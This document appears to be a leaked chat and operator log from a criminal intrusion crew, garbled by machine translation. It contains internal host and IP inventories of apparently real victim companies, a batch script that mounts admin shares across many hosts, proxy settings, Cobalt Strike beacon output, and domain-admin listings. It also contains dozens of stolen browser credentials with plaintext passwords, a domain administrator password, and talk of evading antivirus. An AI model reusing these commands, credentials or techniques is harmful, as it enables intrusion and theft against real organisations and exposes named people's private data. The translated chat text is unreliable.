ADAM-DESKTOP: 89.0.192.87
23LL76: 89.0.192.189
UPS580: 89.0.191.216
24L11: 10.58.0.135
33LL67: 89.0.192.215
30L43: 89.0.192.45
28L4A: 89.0.192.6
27L24: 10.32.0.191
CNSZCYDGG13: 10.7.3.13
NB02B_RTPSZ: 10.17.4.40
CNSZD6RTNY02: 10.7.2.76
30L07: 89.0.191.137
TIS-RTP: 10.7.2.81
25L59: 89.0.191.46
26L47: 10.25.0.130
25L9: 89.0.191.43
25L42: 89.0.193.15
26L251: 10.32.1.188
30LL56: 89.0.191.172
32LL58: 10.58.58.91
CNSZD2M6RC3X: 10.7.2.106
DEPCON10B: 89.0.192.150
DEPCON10SG: 10.5.1.21
SG20160916-PC: 10.5.1.75
SG20190107-PC: 10.5.1.103
SUZHOU-JOLYN: 10.7.2.151
SG20140923-NB1: 10.5.1.131
30L30: 10.1.8.145
MXL5040QYD-1: 10.1.8.220
PRTMONITOR: 10.89.11.36
29LL22: 172.22.245.162
28LL50: 10.13.0.87
DEPCON10FR: 89.0.192.141
DENNIS15: 89.0.88.20
25L37: 89.0.192.47
DENNIS10: 10.33.255.253
31LL31: 89.0.203.201
30L24A: 10.1.5.208
26L14: 10.33.1.246
31LL35: 172.22.245.170
27L07: 89.0.191.57
27L09: 89.0.193.118
QATHERMAL: 89.0.191.80
CNSZN84WP433: 10.7.2.163
SG20171218-NB: 10.5.1.56


``````
rtpco.local
SG20170531-NB: 10.5.1.99
W10-FR2018-CYC: 10.4.1.13
30L75: 89.0.192.98
30L36: 10.1.8.143
26L48: 89.0.192.81
LUNCHROOM2: 89.0.6.100
28L18: 10.57.0.61
24L19: 172.22.200.18
BSDESKTOP: 89.0.10.101
23LL7: 10.12.1.7
31LL08: 172.22.200.48
USH832L0DT: 10.1.8.128
30L40: 89.0.191.147
RTP-FGY: 10.7.2.58
W10-F2014-PYBA: 10.4.1.103
29LL36: 172.22.245.170
SG20180424-PC: 10.5.1.53
26L7: 89.0.192.3
25L5: 172.22.200.62
CNSZ6K9ZJ13: 10.7.3.20
30L29: 10.1.8.157
27L28: 172.22.200.11
30L41: 89.0.191.245
25L3: 89.0.192.77
18L15: 172.22.200.11
27L06: 89.0.192.160
30L94: 10.59.0.156
30L14: 10.36.5.236
AVANITEN: 10.89.11.34
31LL42HR: 89.0.191.209
31LL19: 89.0.192.102
27L12: 10.56.0.166
26L05: 172.22.200.24
31LL36: 172.22.245.162
28L24: 10.57.0.85
28LL75: 172.22.200.29
30L54: 89.0.191.174
24L20: 172.22.245.137
RTP_SZ_ZPH: 10.17.4.14
SG2010018: 10.5.1.105
WIN7-2016-CHG: 10.28.0.100
28LL56: 89.0.192.215
30L47: 10.59.0.113
30L22: 10.1.5.151
AXUPS: 10.89.11.35
30L93: 10.59.0.106
26L59: 89.0.193.94
25L43: 172.22.200.66
30L10: 89.0.193.76



``````
rtpco.local
24L5: 10.33.2.239
30L96: 89.0.191.196
26L23: 10.58.0.156
30L65: 10.1.10.146
26L55: 10.56.0.118
SUZHOU-JANE: 10.7.2.136
28L19: 89.0.191.215
25L38: 89.0.192.172
30LL17: 89.0.203.201
22LL11: 10.33.1.254
32LL15: 89.0.203.204
26L29: 10.59.0.107
RTP_SZ_C1: 10.17.4.4
28L13: 10.57.0.63
30L59: 172.22.200.30
CNSZ6K0WJ13: 10.7.2.158
30L19: 89.0.192.127
27L14: 89.0.192.118
EQL-SAN2: 10.89.5.120
30L03: 10.36.6.234
30L51: 10.56.0.126
25L12: 89.0.193.67
METROMTRREADER: 89.0.191.183
29LL59: 89.0.203.201
30L21: 10.1.5.205
30L15: 172.22.200.16
29LL9: 10.1.8.104
30L100: 89.0.192.80
32LL62: 89.0.192.244
30L69: 89.0.192.35
VC1: 172.22.254.20
30L68: 89.0.191.58
30L98: 10.59.0.148
30L98: 10.59.0.148 30L92: 10.59.0.148 30L92: 10.89.11.3
32LL42: 89.0.192.239
CANCELET: 10.89.11.22
30LL29: 89.0.192.177
28L10: 89.0.191.39
23LL36: 172.22.200.48
26L07: 10.12.1.3
9.0.193.38
31LL40: 172.22.245.162
30L08: 10.58.0.154
32LL01: 89.0.203.201
30L85: 89.0.192.92
25L60: 89.0.193.101
26L56: 10.56.0.103
31LL22: 10.59.0.167
LTSIMBA1: 10.7.2.70

``````
rtpco.local
WININTERMEC32: 89.0.192.202
30L60: 89.0.192.78
30L44: 89.0.191.148
DCHDESKTOP: 89.0.88.18
ONBASESCAN: 10.89.11.23
GUARDSHAK: 89.0.191.99
30LL27: 10.8.1.240
DEPCON10DV: 89.0.192.142
26L15: 10.13.0.92
30L26: 10.1.5.203
28LL95: 172.22.245.137
RTP_SZ-PC1: 10.17.4.5
RTP_SZ_C: 10.17.4.22
28LL37: 172.22.245.162
W10-F2018-VIB: 10.4.1.46
ORION24: 89.0.191.71
28L16: 89.0.192.60
22L10INDY: 10.89.11.34
30L09: 10.32.1.231
26LL27: 172.22.200.11
30L102: 10.59.0.120
29LL32: 10.25.0.136
29LL57: 89.0.203.201
31LL45: 10.36.5.247
SUZHOU-ZOUWEI: 89.0.203.204
us.alloypolymers.com
USH313A07T: 10.1.5.81
MXL5040SMP: 10.1.5.38
5CG4503TXM: 10.1.5.46
GAHDC570005: 10.1.10.99
5CG5050LDQ: 10.1.10.155
MXL5040SMP-CRT: 10.1.5.43
SPICEWORKSRCH: 10.1.1.124
ALLOYHD01: 10.1.1.124
GAHHP2UA2450T7H: 10.1.10.184
2UA5032HTR: 10.1.10.120
25L51: 10.1.10.220
MXL5040QXR: 10.1.8.83
GAHELECT: 10.1.10.190
GAHWIN7HP6000: 10.1.10.226
5CG5050FL1: 10.1.8.129
U8H835L061: 10.1.8.58
25L63: 10.1.10.244
XNVR-1739997: 10.1.10.180
ORGREMOTEPW: 10.1.8.151
MXL5040QYR: 10.1.8.175
USH0360062: 10.1.10.167
26LL34: 10.1.10.196
USH539L1C1: 172.22.245.170
GAHPROD1: 10.1.10.122
LEASE25-PC: 10.1.10.185
26LL31: 10.1.10.145

``Checkbomb add /persist? If both show up, then cool add 2 hosts to this ipsa)``
@echo off
for /f %%i in (ips.txt) do (
	net use * \\%%i\C$ /persistent:yes
)
```
will it do that? or off with a batko kakim through the memory can take 100 servers per kobytes which kinda does not interfere in the case of 2fa on avmomo not yet pingingada now pinging all domains? total 200 servers? dunno how much interference, I generally quietly walk on their network how much interference? hmm, not a chance to bypass the inmemt in the cloud what is the administrator's browser?
2faSphere is`winona\tom,abcabc4`setg Proxies socks4:104.243.44.69:16219setg Proxies socks4:104.243.44.69:424181
2. kaseya
3. wargroups
  Name : Barracuda Orange Backup Server
    URL : http://10.1.8.14/auth/signin/

    Name : Barracuda Crockett Backup Server
    URL : http://10.1.5.44/auth/signin/
    
    Name : Barracuda Crockett Backup Server
    URL : http://10.1.5.34/auth/signin/

    Name : Barracuda Backup RCH
    URL : http://10.1.1.14/auth/signin/
    
    Name : ORG Barracuda Networks Login
    URL : http://10.1.8.232/web/login?_bcsp=1&_bceq=U2FsdGVkX1_ZQKJqbA-A6J1pDS0v348lRBF4gQRaT1Oos5iW-joM_MbMEGYcdA1LafroouYOUK8fDhjDdsOT4mCUAGvUboqz-KCiF9iyFEw.

    Name : CRT Barracuda Networks Login
    URL : http://10.1.5.180/web/login?_bcsp=1&_bceq=U2FsdGVkX1-zFQuAcSM8y3KXKFNCE-epeWxGww7gw37-3-IbBQlsFBC_6dk77rKf2OplTxoJjBY2xSAtaA0JEgq7yd9tbiBEUiNt-wZbBYo.


``Antivirus.
Bekapyotnichat then write a list of current problems104.243.44.69:42418there's a splinter it kaseya.rtpcompany.com ``there's definitely kasper? There are some problems with kasper, is the rdp port open? The last problem? ``89.0.10.104:445 (platform: 500 version: 6.1 name: NAS-D5-E2-B8 domain: WORKGROUP)`
on us it is not possible to get to us, it's too early to close so then everything is ready to close if the cresses rolled into the sphere? the first time there? all do proxy) `https://172.22.254.20/` yes, but the stupidity of the face opened it means you came? + without /websso.... at the root, what already toputput in the sphere? for the future all - always check the test method node and ip and on the hostname` ``
vc1.rtpco.local:5580
`` vc1.rtpco.local:5480
`` vc1.rtpco.local:636
vc1.rtpco.local:514
vc1.rtpco.local:443
vc1.rtpco.local:389
vc1.rtpco.local:88
vc1.rtpco.local:80
vc1.rtpco.local:22 (SSH-2.0-OpenSSH_7.4)
The first thing is to resolve the name of the proxy and then come in proxy can not do it in dnspo ip come in...omgscan ports webana opens (when you come in what does it say?
Teemo[MNDC2]SYSTEM */7388|2020Dec24 03:09:47> shell ping vc1.rtpco.local -n 1
[*] Tasked beacon to run: ping vc1.rtpco.local -n 1
[+] host called home, sent: 56 bytes
[+] received output:

Pinging vc1.rtpco.local [172.22.254.20] with 32 bytes of data:
Reply from 172.22.254.20: bytes=32 time<1ms TTL=63

Ping statistics for 172.22.254.20:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

``this?``vc1.rtpco.local is dead
Teemo[WINDC2]SYSTEM */4284|2020Dec24 03:08:13> shell ping VMWAREMGR -n 1
[*] Tasked beacon to run: ping VMWAREMGR -n 1
[+] host called home, sent: 50 bytes
[+] received output:

Pinging VMWAREMGR.winona.rtpco.local [89.0.55.9] with 32 bytes of data:
Reply from 89.0.0.92: Destination host unreachable.

Ping statistics for 89.0.55.9:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

``Hosts exist? Judging by the links yes, but to get there does not get + there is even virtualization? such a question is our rocket) who will get the cunt for the initiative unnecessary?)))) I'm intrigued read the main) tell me) we never get bored I'm in a fucking funny situation, kz))))) and who held the meeting I do not know ((but did not let me see anything) Target said that the set and some tests are not in the course I have not even seen themuttut? you didn't happen to check the tests for new candidates? ok then i'll send them in a separate pack i'm ahtung here again but in a couple of hours i'll be taking my test soon so can you give me yours for pars?Cooke?+ do not have to duplicate and you can always consult with me plus I write all sorts of things there are different information flies interesting to work in the general channels remind me to give you tomorrow to roket to online norton and bypass the detector I just did a test so I have no way to parry it i don't think i'm thinking too much now) it's funny how life is so fucked up when no one is thinking about anything it was like this to this day when i used to communicate with the minister i took it from someone else's cobalt long time ago so right i started noticing crooked listener in other people's cobalt
it is RIGHT to write the domain of the pad both in HTTPS hosts and in HTTPS Host (Stager)
if you write ipak from HTtps Host (Stager) - stepping goes "bypassing" SSL certificate which is on the pad - which is FUCKING and adds blocking by phasers all I see
 give me the session pass
takehq.com

No hedgehog
beacon> shell dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\Default\History"
[*] Tasked beacon to run: dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\Default\History"
[+] host called home, sent: 108 bytes
[+] received output:
The system cannot find the path specified.

beacon> shell dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\Default\"
[*] Tasked beacon to run: dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\Default\"
[+] host called home, sent: 101 bytes
[+] received output:
The system cannot find the path specified.

beacon> shell dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\"
[*] Tasked beacon to run: dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\User Data\"
[+] host called home, sent: 93 bytes
[+] received output:
The system cannot find the file specified.

beacon> shell dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\"
[*] Tasked beacon to run: dir "C:\Users\Djarden\AppData\Local\Microsoft\Edge\"
[+] host called home, sent: 83 bytes
[+] received output:
 Volume in drive C has no label.
 Volume Serial Number is D0FC-5A15

 Directory of C:\Users\Djarden\AppData\Local\Microsoft\Edge

08/05/2019 07:05 AM <DIR> .
08/05/2019 07:05 AM <DIR> .
               0 File(s) 0 bytes
               2 Dir(s) 24,238,346,240 bytes free

``at least give me a sign of life'' (no session) ``c:\users\USERNAME\AppData\Local\Microsoft\Edge\User Data\Default\History````
 Directory of C:\Users\Djarden\AppData\Local\MicrosoftEdge\User\Default

01/26/2017 10:24 AM <DIR> .
01/26/2017 10:24 AM <DIR> .
               0 File(s) 0 bytes
               2 Dir(s) 24,248,209,408 bytes free
```
```
 Directory of C:\Users\Djarden\AppData\Local\Microsoft\Edge

08/05/2019 07:05 AM <DIR> .
08/05/2019 07:05 AM <DIR> .
               0 File(s) 0 bytes
               2 Dir(s) 24,254,611,456 bytes free
```
```
 Directory of C:\Users\Djarden\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge

02/03/2017 08:42 AM <DIR> .
02/03/2017 08:42 AM <DIR> .
01/26/2017 09:48 AM <DIR> CortanaAssist
02/03/2017 08:42 AM <DIR> Extensions
01/26/2017 09:46 AM <DIR> PlayReady
01/30/2019 01:13 PM <DIR> UrlBlock
01/26/2017 09:46 AM <DIR> User
               0 File(s) 0 bytes
               7 Dir(s) 24,243,003,392 bytes free
```
```
 Directory of C:\Users\Djarden\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\User\Default

04/26/2017 09:01 AM <DIR> .
04/26/2017 09:01 AM <DIR> .
04/26/2017 09:01 AM <DIR> BrowserImport
01/15/2021 01:13 PM <DIR> DataStore
01/22/2018 10:23 AM <DIR> DomainSuggestions
01/26/2017 09:46 AM <DIR> Favorites
01/26/2017 09:46 AM <DIR> ImageStore
09/10/2020 03:38 PM <DIR> RACShare
08/28/2017 01:01 PM <DIR> Recovery
               0 File(s) 0 bytes
               9 Dir(s) 24,242,847,744 bytes free
```
```
 Directory of C:\Users\Djarden\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\History

File Not Found
``Ah, yes, I switched servers
```
setg Proxies socks4:185.150.189.165:43940
`takehq.com give me a passport session i asked to leave for the maila why did you put out the socks?) not a folder there history file should lie hezh? 1 megabyte fftam and chrome `asdvtgr5erqwdf` and go to the ortn try it yourself pick me pliz history file i do not believe that not dumpedda it does not have a fox?I don't know if it's a good idea to get it from her, but I'm not sure if it's a good idea to get it from her, I just don't know if it's a good idea to get it from her.
```
DA
Members

-------------------------------------------------------------------------------
Administrator arobinsona cancelet
kaseyaservice O365Service sagert

The command completed successfully.

```


```
Members

-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
RTP-Admins_Ent
vmbackup
The command completed successfully.


``Error when opening the archive-rezip Symantec Endpoint Protection
Kaspersky Endpoint Security 10 for Windows

And some https://www.kaseya.com

```
DA

Members

-------------------------------------------------------------------------------
Administrator adonixadmin alloyamms
Angel barracuda BarracudaBUP
bbuerck BGW CAncelet
canceleta cevansa citrix_svc
DHaase EntAdmin gahbarracuda
orgbarracuda sagert Services_Backup
Uptime veeam wstangea

```

```
EA

Members

-------------------------------------------------------------------------------
Administrator EntAdmin Services_Backup
Uptime wstangea
The command completed successfully.

```

```
LA richmonddc1
Members

-------------------------------------------------------------------------------
Administrator
adonixadmin
Domain Admins
EntAdmin
Enterprise Admins
sagert
Services_Backup
smonitor
Uptime
The command completed successfully.

``````
[*] Beginning Edge Extraction.

--- Chromium Credential (User: mharper) ---
URL : https://id.atlassian.com/signup/invite
Username : mharper@waterway.com
Password : LoveUnit14#

[*] Finished Edge extraction.
What's in the hedgehog, if sharpweb is dead, I check the files in gkeller\g$ so what's in the hedgehog?
http://192.168.0.80/
http://192.168.0.11/
http://192.168.0.43/
http://192.168.0.57/
http://192.168.0.47/
http://192.168.0.121:8080/
``Check out chrome, the hedgehog and the hedgehog didn't check out``` so I downloaded the profile of the ff and the browsers from it?
File Not Found

``File Guess What```
 Volume in drive C is Windows
 Volume Serial Number is A6E5-1986

``Do then ``dir C:\users\*.rdg /s`` is not there this password has a session? I also asked to see the rdp there from-guesspolzak and taka and what about the takapolzak from what taka? or sharpChrome?it's from where? i see it's just there, i can't see the password if it's not waterway99! let me try there's a saved password i'll tell you more last time bingo was in the history ffugaday where did bingo know? 49655	https://infosight.hpe.com/app/login HPE InfoSight | Hewlett Packard Enterprise 1 0 13250782013357001watch the admins on the rdp interestingI by the way the web port does not work there
127.0.1.1:3389
127.0.1.1:445
maybe it's true....keep all mail accesses nearby to clean up the alerts if we find nimble accesses by the way i figured it was a redirect to 127.0.0.1 noticed this message long time ago when i was going through the mail using the word nimble so i fucked up my time :` `
beacon> shell ping -a 127.0.1.1
[*] Tasked beacon to run: ping -a 127.0.1.1.
[+] host called home, sent: 48 bytes
[+] received output:

Pinging 127.0.1.1 with 32 bytes of data:
Reply from 127.0.1.1: bytes=32 time<1ms TTL=128
Reply from 127.0.1.1: bytes=32 time<1ms TTL=128
Reply from 127.0.1.1: bytes=32 time<1ms TTL=128
Reply from 127.0.1.1: bytes=32 time<1ms TTL=128

Ping statistics for 127.0.1.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

beacon> shell nslookup 127.0.1.1
[*] Tasked beacon to run: nslookup 127.0.1.1
[+] host called home, sent: 49 bytes
[+] received output:
*** wwdc2.waterway.com can't find 127.0.1.1: Non-existent domain

Server: wwdc2.waterway.com
Address: 192.168.0.222
and the other 50% is another way is 50%[ ](https://mediaeveryone.com/group/waterway-com?msg=HjARdNfzFS88zuRew) take into account the fact that they mb tupo badly configured it can immediately nslookup[ ](https://mediaeveryone.com/group/waterway-com?msg=8APBAwuecQy7S2Etk) no, it's a chip. last logon write during login) pinging from the network 127.0.1.1 is a service crap for spam mail tact "with itself" is not 127.0.0.so for ssh would be third-party iptipo they go there(?) well ssh isa127.0.1.1.1 there is writing root login from if you mean what I wrote abovein meaning? just smssochki strange-nimbeltam eto gde tam rd port open? tell me on the request for password while i see that they complain "i forgot my password from my kankuntemr((( "and here rakspeyspro nimbly here are samesochki come on the desktop nothing interesting?
```
netstat /p tcp /a | findstr 3389
``anything on the desktop? Look where the rdp opens in the ff, nothing interesting
URL : https://mail.datotel.com/
Username : hd@waterway.com
Password : Waterway1
```
did you check this e-mail? that's how we haven't found it yet they seem to have a vendor database with this kind of access
--- Chromium Credential (User: mapusatera) ---
URL : http://wwsql01/
Username : sa
Password : sa
``````
--- Chromium Credential (User: mapusatera) ---
URL : https://auth.monday.com/users/invitation/accept
Username : 3146293823
Password : BlML#D6oJ155

--- Chromium Credential (User: mapusatera) ---
URL : https://waterwaycarwash.monday.com/users/sign_in
Username : 3146293823
Password : BlML#D6oJ155

--- Chromium Credential (User: mapusatera) ---
URL : https://www.cnn.com/account/register
Username : 63367
Password : Wf$.tP-sF2Z4pF*

--- Chromium Credential (User: mapusatera) ---
URL : https://aim.luminatehealth.com/login
Username : michaelpusatera@gmail.com
Password : kUVkch.4M.YBR9X

--- Chromium Credential (User: mapusatera) ---
URL :
Username : michaelpusatera@gmail.com
Password : 715Drew

--- Chromium Credential (User: mapusatera) ---
URL : https://www.hollisterco.com/shop/OrderItemDisplayView
Username :
Password : N-nC2c*bTB_C-v-

--- Chromium Credential (User: mapusatera) ---
URL : https://shop.lululemon.com/shop/checkout/confirmation
Username : amybrinkman13@gmail.com
Password : fws5z&mQtf5WUVH

--- Chromium Credential (User: mapusatera) ---
URL : https://www.ae.com/us/en/cart
Username : morganpusatera@icloud.com
Password : ILOVEDANCE123\

[*] Finished Google Chrome extraction.

[*] Beginning Edge Extraction.

--- Chromium Credential (User: mapusatera) ---
URL : https://system.netsuite.com/
Username : mpusatera@sotelsystems.com
Password :

--- Chromium Credential (User: mapusatera) ---
URL : https://login5.silverpop.com/
Username : transact@waterway.com
Password : $tqMy2K5%T#r

--- Chromium Credential (User: mapusatera) ---
URL : http://wwsql01/
Username : sa
Password : sa

--- Chromium Credential (User: mapusatera) ---
URL : https://login.live.com/
Username : map@waterway.com
Password :

--- Chromium Credential (User: mapusatera) ---
URL : http://reportserver.waterway.com/
Username : sa
Password :

--- Chromium Credential (User: mapusatera) ---
URL : https://login5.silverpop.com/
Username : map@waterway.com
Password : %0%f#rC!5vJj

--- Chromium Credential (User: mapusatera) ---
URL : https://mail.datotel.com/
Username : hd@waterway.com
Password : Waterway1

--- Chromium Credential (User: mapusatera) ---
URL : http://reportserver.waterway.com/
Username : waterway\administrator
Password :

--- Chromium Credential (User: mapusatera) ---
URL : https://signin.quicken.com/
Username : michaelpusatera@gmail.com
Password :

--- Chromium Credential (User: mapusatera) ---
URL : https://www.waterway.com/
Username : michaelpusatera@gmail.com
Password : fgSrBr%2#cJx

--- Chromium Credential (User: mapusatera) ---
URL : https://login.live.com/
Username : michaelpusatera@gmail.com
Password : Richie42
I'll take a look, while you take off the chrome and explore the car, I see he has a FF thank you
make_token WATERWAY\Administrator 1853Gators
``Give me an admin account for the token
Image Name PID Session Name Session# Mem Usage User Name CPU Time
========================= ======== ================ =========== ============ ================================================== ============
System Idle Process 0 Services 0 8 K NT AUTHORITY\SYSTEM 29:59:15
System 4 Services 0 1,240 K N/A 0:05:27
Secure System 72 Services 0 40,344 K NT AUTHORITY\SYSTEM 0:00:00
Registry 132 Services 0 103,088 K NT AUTHORITY\SYSTEM 0:00:07
smss.exe 520 Services 0 1,136 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 896 Services 0 4,932 K NT AUTHORITY\SYSTEM 0:00:04
wininit.exe 988 Services 0 6,092 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 996 Console 1 3,936 K NT AUTHORITY\SYSTEM 0:00:00
services.exe 816 Services 0 14,728 K NT AUTHORITY\SYSTEM 0:06:11
LsaIso.exe 644 Services 0 2,844 K NT AUTHORITY\SYSTEM 0:00:00
lsass.exe 788 Services 0 28,512 K NT AUTHORITY\SYSTEM 0:00:30
svchost.exe 1136 Services 0 28,364 K NT AUTHORITY\SYSTEM 0:00:05
WUDFHost.exe 1164 Services 0 7,648 K NT AUTHORITY\LOCAL SERVICE 0:00:00
fontdrvhost.exe 1200 Services 0 3,300 K Font Driver Host\UMFD-0 0:00:00
winlogon.exe 1288 Console 1 8,348 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 1348 Services 0 17,564 K NT AUTHORITY\NETWORK SERVICE 0:00:20
svchost.exe 1400 Services 0 10,344 K NT AUTHORITY\SYSTEM 0:00:04
fontdrvhost.exe 1424 Console 1 2,720 K Font Driver Host\UMFD-1 0:00:00
LogonUI.exe 1508 Console 1 51,348 K NT AUTHORITY\SYSTEM 0:00:03
svchost.exe 1612 Services 0 177,256 K NT AUTHORITY\NETWORK SERVICE 0:03:30
svchost.exe 1660 Services 0 7,028 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 1668 Services 0 7,484 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 1676 Services 0 4,864 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 1684 Services 0 10,660 K NT AUTHORITY\LOCAL SERVICE 0:00:00
dwm.exe 1696 Console 1 33,872 K Window Manager\DWM-1 0:00:00
svchost.exe 1704 Services 0 6,136 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 1712 Services 0 10,664 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 1732 Services 0 5,060 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 1920 Services 0 8,768 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 1928 Services 0 6,904 K NT AUTHORITY\LOCAL SERVICE 0:00:01
svchost.exe 1936 Services 0 11,164 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 876 Services 0 9,372 K NT AUTHORITY/NETWORK SERVICE 0:00:06
svchost.exe 1480 Services 0 15,148 K NT AUTHORITY\SYSTEM 0:00:01
svchost.exe 2096 Services 0 5,948 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 2132 Services 0 6,864 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 2168 Services 0 17,260 K NT AUTHORITY\LOCAL SERVICE 0:00:36
svchost.exe 2196 Services 0 8,172 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 2208 Services 0 13,320 K NT AUTHORITY\SYSTEM 0:00:01
svchost.exe 2256 Services 0 18,528 K NT AUTHORITY\LOCAL SERVICE 0:00:05
svchost.exe 2444 Services 0 9,292 K NT AUTHORITY\SYSTEM 0:00:01
svchost.exe 2524 Services 0 10,280 K NT AUTHORITY/NETWORK SERVICE 0:00:03
svchost.exe 2580 Services 0 5,760 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 2716 Services 0 7,184 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 2728 Services 0 16,268 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 2776 Services 0 8,380 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 2824 Services 0 24,512 K NT AUTHORITY\SYSTEM 0:02:36
svchost.exe 2892 Services 0 9,584 K NT AUTHORITY\SYSTEM 0:00:00
vmms.exe 3060 Services 0 22,292 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 3128 Services 0 6,976 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 3156 Services 0 7,048 K NT AUTHORITY\LOCAL SERVICE 0:00:01
svchost.exe 3168 Services 0 6,508 K NT AUTHORITY\LOCAL SERVICE 0:00:00
NVDisplay.Container.exe 3276 Services 0 16,440 K NT AUTHORITY\SYSTEM 0:00:01
svchost.exe 3284 Services 0 10,532 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 3296 Services 0 10,420 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 3384 Services 0 8,780 K NT AUTHORITY\NETWORK SERVICE 0:00:00
svchost.exe 3480 Services 0 8,792 K NT AUTHORITY\SYSTEM 0:00:33
svchost.exe 3488 Services 0 5,508 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 3496 Services 0 7,696 K NT AUTHORITY\LOCAL SERVICE 0:00:01
svchost.exe 3664 Services 0 6,560 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 3672 Services 0 9,656 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 3768 Services 0 9,088 K NT AUTHORITY\SYSTEM 0:00:00
Memory Compression 3776 Services 0 420,412 K NT AUTHORITY\SYSTEM 0:00:24
svchost.exe 3876 Services 0 7,652 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 3888 Services 0 7,524 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 3996 Services 0 8,412 K NT AUTHORITY\SYSTEM 0:00:00
dasHost.exe 4300 Services 0 10,316 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 4364 Services 0 7,416 K NT AUTHORITY\LOCAL SERVICE 0:00:00
vmcompute.exe 4500 Services 0 6,648 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 4520 Services 0 13,532 K NT AUTHORITY\LOCAL SERVICE 0:00:03
svchost.exe 4592 Services 0 5,808 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 4600 Services 0 8,532 K NT AUTHORITY\LOCAL SERVICE 0:00:00
svchost.exe 4640 Services 0 6,684 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 4768 Services 0 12,944 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 4812 Services 0 15,420 K NT AUTHORITY\SYSTEM 0:00:09
spoolsv.exe 4864 Services 0 28,180 K NT AUTHORITY\SYSTEM 0:00:01
armsvc.exe 4956 Services 0 5,900 K NT AUTHORITY\SYSTEM 0:00:00
winagent.exe 4972 Services 0 23,628 K NT AUTHORITY\SYSTEM 0:00:16
BASupSrvc.exe 5012 Services 0 22,820 K NT AUTHORITY\SYSTEM 0:00:05
AdobeUpdateService.exe 5032 Services 0 7,080 K NT AUTHORITY\SYSTEM 0:00:00
BASupSrvcUpdater.exe 5048 Services 0 15,524 K NT AUTHORITY\SYSTEM 0:00:02
AGMService.exe 5076 Services 0 10,448 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 5100 Services 0 8,764 K NT AUTHORITY\SYSTEM 0:00:00
BtwRSupportService.exe 5116 Services 0 6,920 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 2308 Services 0 12,940 K NT AUTHORITY\NETWORK SERVICE 0:00:00
CarboniteService.exe 4556 Services 0 130,688 K NT AUTHORITY\SYSTEM 1:30:52
BtSwitcherService.exe 4808 Services 0 6,400 K NT AUTHORITY\SYSTEM 0:00:00
CsrBtService.exe 5128 Services 0 8,532 K NT AUTHORITY\SYSTEM 0:00:00
CsrBtOBEXService.exe 5136 Services 0 7,468 K NT AUTHORITY\SYSTEM 0:00:00
AGSService.exe 5144 Services 0 10,000 K NT AUTHORITY\SYSTEM 0:00:00
officeclicktorun.exe 5168 Services 0 29,316 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 5244 Services 0 34,896 K NT AUTHORITY\SYSTEM 0:00:12
svchost.exe 5252 Services 0 40,360 K NT AUTHORITY\LOCAL SERVICE 0:00:11
EPIntegrationService.exe 5264 Services 0 16,884 K NT AUTHORITY\SYSTEM 0:00:02
EPUpdateService.exe 5344 Services 0 9,172 K NT AUTHORITY\SYSTEM 0:00:02
EPSecurityService.exe 5352 Services 0 405,312 K NT AUTHORITY\SYSTEM 0:04:30
EPProtectedService.exe 5388 Services 0 8,252 K NT AUTHORITY\SYSTEM 0:00:00
bdredline.exe 5404 Services 0 12,116 K NT AUTHORITY\SYSTEM 0:00:00
fbguard.exe 5488 Services 0 6,244 K NT AUTHORITY\SYSTEM 0:00:00
MSOIDSVC.EXE 5636 Services 0 15,232 K NT AUTHORITY\SYSTEM 0:00:00
jhi_service.exe 5720 Services 0 5,964 K NT AUTHORITY\SYSTEM 0:00:00
